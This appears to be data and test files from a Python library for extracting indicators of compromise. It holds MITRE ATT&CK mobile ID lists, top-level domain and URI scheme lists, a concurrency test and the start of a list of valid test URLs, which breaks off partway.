mobile_attack_mitigations = ['M1013', 'M1005', 'M1002', 'M1007', 'M1010', 'M1009', 'M1012', 'M1014', 'M1003', 'M1001', 'M1004', 'M1006', 'M1011']
mobile_attack_tactics = ['TA0035', 'TA0037', 'TA0031', 'TA0030', 'TA0032', 'TA0036', 'TA0034', 'TA0027', 'TA0033', 'TA0038', 'TA0028', 'TA0029', 'TA0039']
mobile_attack_techniques = ['T1453', 'T1401', 'T1445', 'T1435', 'T1433', 'T1432', 'T1517', 'T1413', 'T1409', 'T1438', 'T1416', 'T1402', 'T1434', 'T1431', 'T1418', 'T1427', 'T1460', 'T1429', 'T1512', 'T1414', 'T1412', 'T1510', 'T1436', 'T1532', 'T1471', 'T1533', 'T1447', 'T1475', 'T1476', 'T1440', 'T1446', 'T1419', 'T1459', 'T1408', 'T1520', 'T1466', 'T1407', 'T1456', 'T1439', 'T1523', 'T1455', 'T1428', 'T1404', 'T1449', 'T1450', 'T1405', 'T1458', 'T1477', 'T1442', 'T1420', 'T1472', 'T1417', 'T1516', 'T1411', 'T1425', 'T1478', 'T1464', 'T1430', 'T1461', 'T1457', 'T1454', 'T1462', 'T1473', 'T1452', 'T1463', 'T1444', 'T1403', 'T1398', 'T1400', 'T1399', 'T1507', 'T1423', 'T1410', 'T1406', 'T1470', 'T1448', 'T1424', 'T1443', 'T1468', 'T1469', 'T1467', 'T1465', 'T1451', 'T1513', 'T1437', 'T1521', 'T1441', 'T1474', 'T1508', 'T1426', 'T1422', 'T1421', 'T1415', 'T1509', 'T1481']

tlds = [
    'aaa',
    'aarp',
    'abarth',
    'abb',
    'abbott',
    'abbvie',
    'abc',
    'able',
    'abogado',
    'abudhabi',
    'ac',
    'academy',
    'accenture',
    'accountant',
    'accountants',
    'aco',
    'active',
    'actor',
    'ad',
    'adac',
    'ads',
    'adult',
    'ae',
    'aeg',
    'aero',
    'aetna',
    'af',
    'afamilycompany',
    'afl',
    'africa',
    'ag',
    'agakhan',
    'agency',
    'ai',
    'aig',
    'aigo',
    'airbus',
    'airforce',
    'airtel',
    'akdn',
    'al',
    'alfaromeo',
    'alibaba',
    'alipay',
    'allfinanz',
    'allstate',
    'ally',
    'alsace',
    'alstom',
    'am',
    'americanexpress',
    'americanfamily',
    'amex',
    'amfam',
    'amica',
    'amsterdam',
    'analytics',
    'android',
    'anquan',
    'anz',
    'ao',
    'aol',
    'apartments',
    'app',
    'apple',
    'aq',
    'aquarelle',
    'ar',
    'arab',
    'aramco',
    'archi',
    'army',
    'arpa',
    'art',
    'arte',
    'as',
    'asda',
    'asia',
    'associates',
    'at',
    'athleta',
    'attorney',
    'au',
    'auction',
    'audi',
    'audible',
    'audio',
    'auspost',
    'author',
    'auto',
    'autos',
    'avianca',
    'aw',
    'aws',
    'ax',
    'axa',
    'az',
    'azure',
    'ba',
    'baby',
    'baidu',
    'banamex',
    'bananarepublic',
    'band',
    'bank',
    'bar',
    'barcelona',
    'barclaycard',
    'barclays',
    'barefoot',
    'bargains',
    'baseball',
    'basketball',
    'bauhaus',
    'bayern',
    'bb',
    'bbc',
    'bbt',
    'bbva',
    'bcg',
    'bcn',
    'bd',
    'be',
    'beats',
    'beauty',
    'beer',
    'bentley',
    'berlin',
    'best',
    'bestbuy',
    'bet',
    'bf',
    'bg',
    'bh',
    'bharti',
    'bi',
    'bible',
    'bid',
    'bike',
    'bing',
    'bingo',
    'bio',
    'biz',
    'bj',
    'black',
    'blackfriday',
    'blanco',
    'blockbuster',
    'blog',
    'bloomberg',
    'blue',
    'bm',
    'bms',
    'bmw',
    'bn',
    'bnl',
    'bnpparibas',
    'bo',
    'boats',
    'boehringer',
    'bofa',
    'bom',
    'bond',
    'boo',
    'book',
    'booking',
    'bosch',
    'bostik',
    'boston',
    'bot',
    'boutique',
    'box',
    'br',
    'bradesco',
    'bridgestone',
    'broadway',
    'broker',
    'brother',
    'brussels',
    'bs',
    'bt',
    'budapest',
    'bugatti',
    'build',
    'builders',
    'business',
    'buy',
    'buzz',
    'bv',
    'bw',
    'by',
    'bz',
    'bzh',
    'ca',
    'cab',
    'cafe',
    'cal',
    'call',
    'calvinklein',
    'cam',
    'camera',
    'camp',
    'cancerresearch',
    'canon',
    'capetown',
    'capital',
    'capitalone',
    'car',
    'caravan',
    'cards',
    'care',
    'career',
    'careers',
    'cars',
    'cartier',
    'casa',
    'case',
    'caseih',
    'cash',
    'casino',
    'cat',
    'catering',
    'catholic',
    'cba',
    'cbn',
    'cbre',
    'cbs',
    'cc',
    'cd',
    'ceb',
    'center',
    'ceo',
    'cern',
    'cf',
    'cfa',
    'cfd',
    'cg',
    'ch',
    'chanel',
    'channel',
    'charity',
    'chase',
    'chat',
    'cheap',
    'chintai',
    'christmas',
    'chrome',
    'chrysler',
    'church',
    'ci',
    'cipriani',
    'circle',
    'cisco',
    'citadel',
    'citi',
    'citic',
    'city',
    'cityeats',
    'ck',
    'cl',
    'claims',
    'cleaning',
    'click',
    'clinic',
    'clinique',
    'clothing',
    'cloud',
    'club',
    'clubmed',
    'cm',
    'cn',
    'co',
    'coach',
    'codes',
    'coffee',
    'college',
    'cologne',
    'com',
    'comcast',
    'commbank',
    'community',
    'company',
    'compare',
    'computer',
    'comsec',
    'condos',
    'construction',
    'consulting',
    'contact',
    'contractors',
    'cooking',
    'cookingchannel',
    'cool',
    'coop',
    'corsica',
    'country',
    'coupon',
    'coupons',
    'courses',
    'cr',
    'credit',
    'creditcard',
    'creditunion',
    'cricket',
    'crown',
    'crs',
    'cruise',
    'cruises',
    'csc',
    'cu',
    'cuisinella',
    'cv',
    'cw',
    'cx',
    'cy',
    'cymru',
    'cyou',
    'cz',
    'dabur',
    'dad',
    'dance',
    'data',
    'date',
    'dating',
    'datsun',
    'day',
    'dclk',
    'dds',
    'de',
    'deal',
    'dealer',
    'deals',
    'degree',
    'delivery',
    'dell',
    'deloitte',
    'delta',
    'democrat',
    'dental',
    'dentist',
    'desi',
    'design',
    'dev',
    'dhl',
    'diamonds',
    'diet',
    'digital',
    'direct',
    'directory',
    'discount',
    'discover',
    'dish',
    'diy',
    'dj',
    'dk',
    'dm',
    'dnp',
    'do',
    'docs',
    'doctor',
    'dodge',
    'dog',
    'doha',
    'domains',
    'dot',
    'download',
    'drive',
    'dtv',
    'dubai',
    'duck',
    'dunlop',
    'duns',
    'dupont',
    'durban',
    'dvag',
    'dvr',
    'dz',
    'earth',
    'eat',
    'ec',
    'eco',
    'edeka',
    'edu',
    'education',
    'ee',
    'eg',
    'email',
    'emerck',
    'energy',
    'engineer',
    'engineering',
    'enterprises',
    'epost',
    'epson',
    'equipment',
    'er',
    'ericsson',
    'erni',
    'es',
    'esq',
    'estate',
    'esurance',
    'et',
    'etisalat',
    'eu',
    'eurovision',
    'eus',
    'events',
    'everbank',
    'exchange',
    'expert',
    'exposed',
    'express',
    'extraspace',
    'fage',
    'fail',
    'fairwinds',
    'faith',
    'family',
    'fan',
    'fans',
    'farm',
    'farmers',
    'fashion',
    'fast',
    'fedex',
    'feedback',
    'ferrari',
    'ferrero',
    'fi',
    'fiat',
    'fidelity',
    'fido',
    'film',
    'final',
    'finance',
    'financial',
    'fire',
    'firestone',
    'firmdale',
    'fish',
    'fishing',
    'fit',
    'fitness',
    'fj',
    'fk',
    'flickr',
    'flights',
    'flir',
    'florist',
    'flowers',
    'fly',
    'fm',
    'fo',
    'foo',
    'food',
    'foodnetwork',
    'football',
    'ford',
    'forex',
    'forsale',
    'forum',
    'foundation',
    'fox',
    'fr',
    'free',
    'fresenius',
    'frl',
    'frogans',
    'frontdoor',
    'frontier',
    'ftr',
    'fujitsu',
    'fujixerox',
    'fun',
    'fund',
    'furniture',
    'futbol',
    'fyi',
    'ga',
    'gal',
    'gallery',
    'gallo',
    'gallup',
    'game',
    'games',
    'gap',
    'garden',
    'gb',
    'gbiz',
    'gd',
    'gdn',
    'ge',
    'gea',
    'gent',
    'genting',
    'george',
    'gf',
    'gg',
    'ggee',
    'gh',
    'gi',
    'gift',
    'gifts',
    'gives',
    'giving',
    'gl',
    'glade',
    'glass',
    'gle',
    'global',
    'globo',
    'gm',
    'gmail',
    'gmbh',
    'gmo',
    'gmx',
    'gn',
    'godaddy',
    'gold',
    'goldpoint',
    'golf',
    'goo',
    'goodyear',
    'goog',
    'google',
    'gop',
    'got',
    'gov',
    'gp',
    'gq',
    'gr',
    'grainger',
    'graphics',
    'gratis',
    'green',
    'gripe',
    'grocery',
    'group',
    'gs',
    'gt',
    'gu',
    'guardian',
    'gucci',
    'guge',
    'guide',
    'guitars',
    'guru',
    'gw',
    'gy',
    'hair',
    'hamburg',
    'hangout',
    'haus',
    'hbo',
    'hdfc',
    'hdfcbank',
    'health',
    'healthcare',
    'help',
    'helsinki',
    'here',
    'hermes',
    'hgtv',
    'hiphop',
    'hisamitsu',
    'hitachi',
    'hiv',
    'hk',
    'hkt',
    'hm',
    'hn',
    'hockey',
    'holdings',
    'holiday',
    'homedepot',
    'homegoods',
    'homes',
    'homesense',
    'honda',
    'honeywell',
    'horse',
    'hospital',
    'host',
    'hosting',
    'hot',
    'hoteles',
    'hotels',
    'hotmail',
    'house',
    'how',
    'hr',
    'hsbc',
    'ht',
    'hu',
    'hughes',
    'hyatt',
    'hyundai',
    'ibm',
    'icbc',
    'ice',
    'icu',
    'id',
    'ie',
    'ieee',
    'ifm',
    'ikano',
    'il',
    'im',
    'imamat',
    'imdb',
    'immo',
    'immobilien',
    'in',
    'inc',
    'industries',
    'infiniti',
    'info',
    'ing',
    'ink',
    'institute',
    'insurance',
    'insure',
    'int',
    'intel',
    'international',
    'intuit',
    'investments',
    'io',
    'ipiranga',
    'iq',
    'ir',
    'irish',
    'is',
    'iselect',
    'ismaili',
    'ist',
    'istanbul',
    'it',
    'itau',
    'itv',
    'iveco',
    'jaguar',
    'java',
    'jcb',
    'jcp',
    'je',
    'jeep',
    'jetzt',
    'jewelry',
    'jio',
    'jll',
    'jm',
    'jmp',
    'jnj',
    'jo',
    'jobs',
    'joburg',
    'jot',
    'joy',
    'jp',
    'jpmorgan',
    'jprs',
    'juegos',
    'juniper',
    'kaufen',
    'kddi',
    'ke',
    'kerryhotels',
    'kerrylogistics',
    'kerryproperties',
    'kfh',
    'kg',
    'kh',
    'ki',
    'kia',
    'kim',
    'kinder',
    'kindle',
    'kitchen',
    'kiwi',
    'km',
    'kn',
    'koeln',
    'komatsu',
    'kosher',
    'kp',
    'kpmg',
    'kpn',
    'kr',
    'krd',
    'kred',
    'kuokgroup',
    'kw',
    'ky',
    'kyoto',
    'kz',
    'la',
    'lacaixa',
    'ladbrokes',
    'lamborghini',
    'lamer',
    'lancaster',
    'lancia',
    'lancome',
    'land',
    'landrover',
    'lanxess',
    'lasalle',
    'lat',
    'latino',
    'latrobe',
    'law',
    'lawyer',
    'lb',
    'lc',
    'lds',
    'lease',
    'leclerc',
    'lefrak',
    'legal',
    'lego',
    'lexus',
    'lgbt',
    'li',
    'liaison',
    'lidl',
    'life',
    'lifeinsurance',
    'lifestyle',
    'lighting',
    'like',
    'lilly',
    'limited',
    'limo',
    'lincoln',
    'linde',
    'link',
    'lipsy',
    'live',
    'living',
    'lixil',
    'lk',
    'llc',
    'loan',
    'loans',
    'locker',
    'locus',
    'loft',
    'lol',
    'london',
    'lotte',
    'lotto',
    'love',
    'lpl',
    'lplfinancial',
    'lr',
    'ls',
    'lt',
    'ltd',
    'ltda',
    'lu',
    'lundbeck',
    'lupin',
    'luxe',
    'luxury',
    'lv',
    'ly',
    'ma',
    'macys',
    'madrid',
    'maif',
    'maison',
    'makeup',
    'man',
    'management',
    'mango',
    'map',
    'market',
    'marketing',
    'markets',
    'marriott',
    'marshalls',
    'maserati',
    'mattel',
    'mba',
    'mc',
    'mckinsey',
    'md',
    'me',
    'med',
    'media',
    'meet',
    'melbourne',
    'meme',
    'memorial',
    'men',
    'menu',
    'merckmsd',
    'metlife',
    'mg',
    'mh',
    'miami',
    'microsoft',
    'mil',
    'mini',
    'mint',
    'mit',
    'mitsubishi',
    'mk',
    'ml',
    'mlb',
    'mls',
    'mm',
    'mma',
    'mn',
    'mo',
    'mobi',
    'mobile',
    'mobily',
    'moda',
    'moe',
    'moi',
    'mom',
    'monash',
    'money',
    'monster',
    'mopar',
    'mormon',
    'mortgage',
    'moscow',
    'moto',
    'motorcycles',
    'mov',
    'movie',
    'movistar',
    'mp',
    'mq',
    'mr',
    'ms',
    'msd',
    'mt',
    'mtn',
    'mtr',
    'mu',
    'museum',
    'mutual',
    'mv',
    'mw',
    'mx',
    'my',
    'mz',
    'na',
    'nab',
    'nadex',
    'nagoya',
    'name',
    'nationwide',
    'natura',
    'navy',
    'nba',
    'nc',
    'ne',
    'nec',
    'net',
    'netbank',
    'netflix',
    'network',
    'neustar',
    'new',
    'newholland',
    'news',
    'next',
    'nextdirect',
    'nexus',
    'nf',
    'nfl',
    'ng',
    'ngo',
    'nhk',
    'ni',
    'nico',
    'nike',
    'nikon',
    'ninja',
    'nissan',
    'nissay',
    'nl',
    'no',
    'nokia',
    'northwesternmutual',
    'norton',
    'now',
    'nowruz',
    'nowtv',
    'np',
    'nr',
    'nra',
    'nrw',
    'ntt',
    'nu',
    'nyc',
    'nz',
    'obi',
    'observer',
    'off',
    'office',
    'okinawa',
    'olayan',
    'olayangroup',
    'oldnavy',
    'ollo',
    'om',
    'omega',
    'one',
    'ong',
    'onl',
    'online',
    'onyourside',
    'ooo',
    'open',
    'oracle',
    'orange',
    'org',
    'organic',
    'origins',
    'osaka',
    'otsuka',
    'ott',
    'ovh',
    'pa',
    'page',
    'panasonic',
    'paris',
    'pars',
    'partners',
    'parts',
    'party',
    'passagens',
    'pay',
    'pccw',
    'pe',
    'pet',
    'pf',
    'pfizer',
    'pg',
    'ph',
    'pharmacy',
    'phd',
    'philips',
    'phone',
    'photo',
    'photography',
    'photos',
    'physio',
    'piaget',
    'pics',
    'pictet',
    'pictures',
    'pid',
    'pin',
    'ping',
    'pink',
    'pioneer',
    'pizza',
    'pk',
    'pl',
    'place',
    'play',
    'playstation',
    'plumbing',
    'plus',
    'pm',
    'pn',
    'pnc',
    'pohl',
    'poker',
    'politie',
    'porn',
    'post',
    'pr',
    'pramerica',
    'praxi',
    'press',
    'prime',
    'pro',
    'prod',
    'productions',
    'prof',
    'progressive',
    'promo',
    'properties',
    'property',
    'protection',
    'pru',
    'prudential',
    'ps',
    'pt',
    'pub',
    'pw',
    'pwc',
    'py',
    'qa',
    'qpon',
    'quebec',
    'quest',
    'qvc',
    'racing',
    'radio',
    'raid',
    're',
    'read',
    'realestate',
    'realtor',
    'realty',
    'recipes',
    'red',
    'redstone',
    'redumbrella',
    'rehab',
    'reise',
    'reisen',
    'reit',
    'reliance',
    'ren',
    'rent',
    'rentals',
    'repair',
    'report',
    'republican',
    'rest',
    'restaurant',
    'review',
    'reviews',
    'rexroth',
    'rich',
    'richardli',
    'ricoh',
    'rightathome',
    'ril',
    'rio',
    'rip',
    'rmit',
    'ro',
    'rocher',
    'rocks',
    'rodeo',
    'rogers',
    'room',
    'rs',
    'rsvp',
    'ru',
    'rugby',
    'ruhr',
    'run',
    'rw',
    'rwe',
    'ryukyu',
    'sa',
    'saarland',
    'safe',
    'safety',
    'sakura',
    'sale',
    'salon',
    'samsclub',
    'samsung',
    'sandvik',
    'sandvikcoromant',
    'sanofi',
    'sap',
    'sarl',
    'sas',
    'save',
    'saxo',
    'sb',
    'sbi',
    'sbs',
    'sc',
    'sca',
    'scb',
    'schaeffler',
    'schmidt',
    'scholarships',
    'school',
    'schule',
    'schwarz',
    'science',
    'scjohnson',
    'scor',
    'scot',
    'sd',
    'se',
    'search',
    'seat',
    'secure',
    'security',
    'seek',
    'select',
    'sener',
    'services',
    'ses',
    'seven',
    'sew',
    'sex',
    'sexy',
    'sfr',
    'sg',
    'sh',
    'shangrila',
    'sharp',
    'shaw',
    'shell',
    'shia',
    'shiksha',
    'shoes',
    'shop',
    'shopping',
    'shouji',
    'show',
    'showtime',
    'shriram',
    'si',
    'silk',
    'sina',
    'singles',
    'site',
    'sj',
    'sk',
    'ski',
    'skin',
    'sky',
    'skype',
    'sl',
    'sling',
    'sm',
    'smart',
    'smile',
    'sn',
    'sncf',
    'so',
    'soccer',
    'social',
    'softbank',
    'software',
    'sohu',
    'solar',
    'solutions',
    'song',
    'sony',
    'soy',
    'space',
    'spiegel',
    'sport',
    'spot',
    'spreadbetting',
    'sr',
    'srl',
    'srt',
    'st',
    'stada',
    'staples',
    'star',
    'starhub',
    'statebank',
    'statefarm',
    'stc',
    'stcgroup',
    'stockholm',
    'storage',
    'store',
    'stream',
    'studio',
    'study',
    'style',
    'su',
    'sucks',
    'supplies',
    'supply',
    'support',
    'surf',
    'surgery',
    'suzuki',
    'sv',
    'swatch',
    'swiftcover',
    'swiss',
    'sx',
    'sy',
    'sydney',
    'symantec',
    'systems',
    'sz',
    'tab',
    'taipei',
    'talk',
    'taobao',
    'target',
    'tatamotors',
    'tatar',
    'tattoo',
    'tax',
    'taxi',
    'tc',
    'tci',
    'td',
    'tdk',
    'team',
    'tech',
    'technology',
    'tel',
    'telefonica',
    'temasek',
    'tennis',
    'teva',
    'tf',
    'tg',
    'th',
    'thd',
    'theater',
    'theatre',
    'tiaa',
    'tickets',
    'tienda',
    'tiffany',
    'tips',
    'tires',
    'tirol',
    'tj',
    'tjmaxx',
    'tjx',
    'tk',
    'tkmaxx',
    'tl',
    'tm',
    'tmall',
    'tn',
    'to',
    'today',
    'tokyo',
    'tools',
    'top',
    'toray',
    'toshiba',
    'total',
    'tours',
    'town',
    'toyota',
    'toys',
    'tr',
    'trade',
    'trading',
    'training',
    'travel',
    'travelchannel',
    'travelers',
    'travelersinsurance',
    'trust',
    'trv',
    'tt',
    'tube',
    'tui',
    'tunes',
    'tushu',
    'tv',
    'tvs',
    'tw',
    'tz',
    'ua',
    'ubank',
    'ubs',
    'uconnect',
    'ug',
    'uk',
    'unicom',
    'university',
    'uno',
    'uol',
    'ups',
    'us',
    'uy',
    'uz',
    'va',
    'vacations',
    'vana',
    'vanguard',
    'vc',
    've',
    'vegas',
    'ventures',
    'verisign',
    'versicherung',
    'vet',
    'vg',
    'vi',
    'viajes',
    'video',
    'vig',
    'viking',
    'villas',
    'vin',
    'vip',
    'virgin',
    'visa',
    'vision',
    'vistaprint',
    'viva',
    'vivo',
    'vlaanderen',
    'vn',
    'vodka',
    'volkswagen',
    'volvo',
    'vote',
    'voting',
    'voto',
    'voyage',
    'vu',
    'vuelos',
    'wales',
    'walmart',
    'walter',
    'wang',
    'wanggou',
    'warman',
    'watch',
    'watches',
    'weather',
    'weatherchannel',
    'webcam',
    'weber',
    'website',
    'wed',
    'wedding',
    'weibo',
    'weir',
    'wf',
    'whoswho',
    'wien',
    'wiki',
    'williamhill',
    'win',
    'windows',
    'wine',
    'winners',
    'wme',
    'wolterskluwer',
    'woodside',
    'work',
    'works',
    'world',
    'wow',
    'ws',
    'wtc',
    'wtf',
    'xbox',
    'xerox',
    'xfinity',
    'xihuan',
    'xin',
    'xn--11b4c3d',
    'xn--1ck2e1b',
    'xn--1qqw23a',
    'xn--2scrj9c',
    'xn--30rr7y',
    'xn--3bst00m',
    'xn--3ds443g',
    'xn--3e0b707e',
    'xn--3hcrj9c',
    'xn--3oq18vl8pn36a',
    'xn--3pxu8k',
    'xn--42c2d9a',
    'xn--45br5cyl',
    'xn--45brj9c',
    'xn--45q11c',
    'xn--4gbrim',
    'xn--54b7fta0cc',
    'xn--55qw42g',
    'xn--55qx5d',
    'xn--5su34j936bgsg',
    'xn--5tzm5g',
    'xn--6frz82g',
    'xn--6qq986b3xl',
    'xn--80adxhks',
    'xn--80ao21a',
    'xn--80aqecdr1a',
    'xn--80asehdb',
    'xn--80aswg',
    'xn--8y0a063a',
    'xn--90a3ac',
    'xn--90ae',
    'xn--90ais',
    'xn--9dbq2a',
    'xn--9et52u',
    'xn--9krt00a',
    'xn--b4w605ferd',
    'xn--bck1b9a5dre4c',
    'xn--c1avg',
    'xn--c2br7g',
    'xn--cck2b3b',
    'xn--cg4bki',
    'xn--clchc0ea0b2g2a9gcd',
    'xn--czr694b',
    'xn--czrs0t',
    'xn--czru2d',
    'xn--d1acj3b',
    'xn--d1alf',
    'xn--e1a4c',
    'xn--eckvdtc9d',
    'xn--efvy88h',
    'xn--estv75g',
    'xn--fct429k',
    'xn--fhbei',
    'xn--fiq228c5hs',
    'xn--fiq64b',
    'xn--fiqs8s',
    'xn--fiqz9s',
    'xn--fjq720a',
    'xn--flw351e',
    'xn--fpcrj9c3d',
    'xn--fzc2c9e2c',
    'xn--fzys8d69uvgm',
    'xn--g2xx48c',
    'xn--gckr3f0f',
    'xn--gecrj9c',
    'xn--gk3at1e',
    'xn--h2breg3eve',
    'xn--h2brj9c',
    'xn--h2brj9c8c',
    'xn--hxt814e',
    'xn--i1b6b1a6a2e',
    'xn--imr513n',
    'xn--io0a7i',
    'xn--j1aef',
    'xn--j1amh',
    'xn--j6w193g',
    'xn--jlq61u9w7b',
    'xn--jvr189m',
    'xn--kcrx77d1x4a',
    'xn--kprw13d',
    'xn--kpry57d',
    'xn--kpu716f',
    'xn--kput3i',
    'xn--l1acc',
    'xn--lgbbat1ad8j',
    'xn--mgb9awbf',
    'xn--mgba3a3ejt',
    'xn--mgba3a4f16a',
    'xn--mgba7c0bbn0a',
    'xn--mgbaakc7dvf',
    'xn--mgbaam7a8h',
    'xn--mgbab2bd',
    'xn--mgbai9azgqp6j',
    'xn--mgbayh7gpa',
    'xn--mgbb9fbpob',
    'xn--mgbbh1a',
    'xn--mgbbh1a71e',
    'xn--mgbc0a9azcg',
    'xn--mgbca7dzdo',
    'xn--mgberp4a5d4ar',
    'xn--mgbgu82a',
    'xn--mgbi4ecexp',
    'xn--mgbpl2fh',
    'xn--mgbt3dhd',
    'xn--mgbtx2b',
    'xn--mgbx4cd0ab',
    'xn--mix891f',
    'xn--mk1bu44c',
    'xn--mxtq1m',
    'xn--ngbc5azd',
    'xn--ngbe9e0a',
    'xn--ngbrx',
    'xn--node',
    'xn--nqv7f',
    'xn--nqv7fs00ema',
    'xn--nyqy26a',
    'xn--o3cw4h',
    'xn--ogbpf8fl',
    'xn--otu796d',
    'xn--p1acf',
    'xn--p1ai',
    'xn--pbt977c',
    'xn--pgbs0dh',
    'xn--pssy2u',
    'xn--q9jyb4c',
    'xn--qcka1pmc',
    'xn--qxam',
    'xn--rhqv96g',
    'xn--rovu88b',
    'xn--rvc1e0am3e',
    'xn--s9brj9c',
    'xn--ses554g',
    'xn--t60b56a',
    'xn--tckwe',
    'xn--tiq49xqyj',
    'xn--unup4y',
    'xn--vermgensberater-ctb',
    'xn--vermgensberatung-pwb',
    'xn--vhquv',
    'xn--vuq861b',
    'xn--w4r85el8fhu5dnra',
    'xn--w4rs40l',
    'xn--wgbh1c',
    'xn--wgbl6a',
    'xn--xhq521b',
    'xn--xkc2al3hye2a',
    'xn--xkc2dl3a5ee0h',
    'xn--y9a3aq',
    'xn--yfro4i67o',
    'xn--ygbi2ammx',
    'xn--zfr164b',
    'xxx',
    'xyz',
    'yachts',
    'yahoo',
    'yamaxun',
    'yandex',
    'ye',
    'yodobashi',
    'yoga',
    'yokohama',
    'you',
    'youtube',
    'yt',
    'yun',
    'za',
    'zappos',
    'zara',
    'zero',
    'zip',
    'zippo',
    'zm',
    'zone',
    'zuerich',
    'zw',
    'onion',
]

schemes = [
    'aaa',
    'aaas',
    'about',
    'acap',
    'acct',
    'acr',
    'adiumxtra',
    'afp',
    'afs',
    'aim',
    'appdata',
    'apt',
    'attachment',
    'aw',
    'barion',
    'beshare',
    'bitcoin',
    'bitcoincash',
    'blob',
    'bolo',
    'browserext',
    'calculator',
    'callto',
    'cap',
    'chrome',
    'chrome-extension',
    'cid',
    'coap',
    'coap+tcp',
    'coap+ws',
    'coaps',
    'coaps+tcp',
    'coaps+ws',
    'com-eventbrite-attendee',
    'content',
    'conti',
    'crid',
    'cvs',
    'data',
    'dav',
    'diaspora',
    'dict',
    'did',
    'dis',
    'dlna-playcontainer',
    'dlna-playsingle',
    'dns',
    'dntp',
    'dtn',
    'dvb',
    'ed2k',
    'elsi',
    'example',
    'facetime',
    'fax',
    'feed',
    'feedready',
    'file',
    'filesystem',
    'finger',
    'fish',
    'ftp',
    'geo',
    'gg',
    'git',
    'gizmoproject',
    'go',
    'gopher',
    'graph',
    'gtalk',
    'h323',
    'ham',
    'hcap',
    'hcp',
    'http',
    'https',
    'hxxp',
    'hxxps',
    'hydrazone',
    'iax',
    'icap',
    'icon',
    'im',
    'imap',
    'info',
    'iotdisco',
    'ipn',
    'ipp',
    'ipps',
    'irc',
    'irc6',
    'ircs',
    'iris',
    'iris.beep',
    'iris.lwz',
    'iris.xpc',
    'iris.xpcs',
    'isostore',
    'itms',
    'jabber',
    'jar',
    'jms',
    'keyparc',
    'lastfm',
    'ldap',
    'ldaps',
    'lvlt',
    'magnet',
    'mailserver',
    'mailto',
    'maps',
    'market',
    'message',
    'microsoft.windows.camera',
    'microsoft.windows.camera.multipicker',
    'microsoft.windows.camera.picker',
    'mid',
    'mms',
    'modem',
    'mongodb',
    'moz',
    'ms-access',
    'ms-browser-extension',
    'ms-calculator',
    'ms-drive-to',
    'ms-enrollment',
    'ms-excel',
    'ms-eyecontrolspeech',
    'ms-gamebarservices',
    'ms-gamingoverlay',
    'ms-getoffice',
    'ms-help',
    'ms-infopath',
    'ms-inputapp',
    'ms-lockscreencomponent-config',
    'ms-media-stream-id',
    'ms-mixedrealitycapture',
    'ms-officeapp',
    'ms-people',
    'ms-project',
    'ms-powerpoint',
    'ms-publisher',
    'ms-restoretabcompanion',
    'ms-screenclip',
    'ms-screensketch',
    'ms-search',
    'ms-search-repair',
    'ms-secondary-screen-controller',
    'ms-secondary-screen-setup',
    'ms-settings',
    'ms-settings-airplanemode',
    'ms-settings-bluetooth',
    'ms-settings-camera',
    'ms-settings-cellular',
    'ms-settings-cloudstorage',
    'ms-settings-connectabledevices',
    'ms-settings-displays-topology',
    'ms-settings-emailandaccounts',
    'ms-settings-language',
    'ms-settings-location',
    'ms-settings-lock',
    'ms-settings-nfctransactions',
    'ms-settings-notifications',
    'ms-settings-power',
    'ms-settings-privacy',
    'ms-settings-proximity',
    'ms-settings-screenrotation',
    'ms-settings-wifi',
    'ms-settings-workplace',
    'ms-spd',
    'ms-sttoverlay',
    'ms-transit-to',
    'ms-useractivityset',
    'ms-virtualtouchpad',
    'ms-visio',
    'ms-walk-to',
    'ms-whiteboard',
    'ms-whiteboard-cmd',
    'ms-word',
    'msnim',
    'msrp',
    'msrps',
    'mtqp',
    'mumble',
    'mupdate',
    'mvn',
    'news',
    'nfs',
    'ni',
    'nih',
    'nntp',
    'notes',
    'ocf',
    'oid',
    'onenote',
    'onenote-cmd',
    'opaquelocktoken',
    'openpgp4fpr',
    'pack',
    'palm',
    'paparazzi',
    'pkcs11',
    'platform',
    'pop',
    'pres',
    'prospero',
    'proxy',
    'pwid',
    'psyc',
    'qb',
    'query',
    'redis',
    'rediss',
    'reload',
    'res',
    'resource',
    'rmi',
    'rsync',
    'rtmfp',
    'rtmp',
    'rtsp',
    'rtsps',
    'rtspu',
    'secondlife',
    'service',
    'session',
    'sftp',
    'sgn',
    'shttp',
    'sieve',
    'simpleledger',
    'sip',
    'sips',
    'skype',
    'smb',
    'sms',
    'smtp',
    'snews',
    'snmp',
    'soap.beep',
    'soap.beeps',
    'soldat',
    'spiffe',
    'spotify',
    'ssh',
    'steam',
    'stun',
    'stuns',
    'submit',
    'svn',
    'tag',
    'teamspeak',
    'tel',
    'teliaeid',
    'telnet',
    'tftp',
    'things',
    'thismessage',
    'tip',
    'tn3270',
    'tool',
    'turn',
    'turns',
    'tv',
    'udp',
    'unreal',
    'urn',
    'ut2004',
    'v-event',
    'vemmi',
    'ventrilo',
    'videotex',
    'vnc',
    'view-source',
    'wais',
    'webcal',
    'wpid',
    'ws',
    'wss',
    'wtai',
    'wyciwyg',
    'xcon',
    'xcon-userid',
    'xfire',
    'xmlrpc.beep',
    'xmlrpc.beeps',
    'xmpp',
    'xri',
    'ymsgr',
    'z39.50',
    'z39.50r',
    'z39.50s',
]



# -*- coding: utf-8 -*-

import concurrent.futures

from ioc_finder import find_iocs


def test_nested_concurrency():
    texts = ['example.com', 'foo bar bang buzz', 'This is just an example.com https://example.org/test/bingo.php']
    results = []

    with concurrent.futures.ThreadPoolExecutor() as executor:
        results = [i for i in executor.map(find_iocs, texts)]

    assert results[0]['domains'] == ['example.com']
    assert 'example.com' in results[2]['domains']
    assert 'example.org' in results[2]['domains']
    assert results[2]['urls'] == ['https://example.org/test/bingo.php']



#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Test the URL parsing against the urls here: https://mathiasbynens.be/demo/url-regex."""

from ioc_finder import find_iocs

VALID_URLS = [
    'http://foo.com/blah_blah',
    'http://foo.com/blah_blah/',
    'http://foo.com/blah_blah_(wikipedia)',
    'http://foo.com/blah_blah_(wikipedia)_(again)',
    'http://www.example.com/wpstyle/?p=364',
    'https://www.example.com/foo/?bar=baz&inga=42&quux',
    'http://✪df.ws/123',
    'http://userid:password@example.com:8080',
    'http://userid:password@example.com:8080/',
    'http://userid@example.com',
    'http://userid@example.com/',
    'http://userid@example.com:8080',
    'http://userid@example.com:8080/',
    'http://userid:password@example.com',
    'http://userid:password@example.com/',
    'http://142.42.1.1/',
    'http://142.42.1.1:8080/',
    'http://➡.ws/䨹',
    'http://⌘.ws',
    'http://⌘.ws/',
    'http://foo.com/blah_(wikipedia)#cite-1',
    'http://foo.com/blah_(wikipedia)_blah#cite-1',
    'http://foo.com/unicode_(✪)_in_parens',
    'http://foo.com/(something)?after=parens',
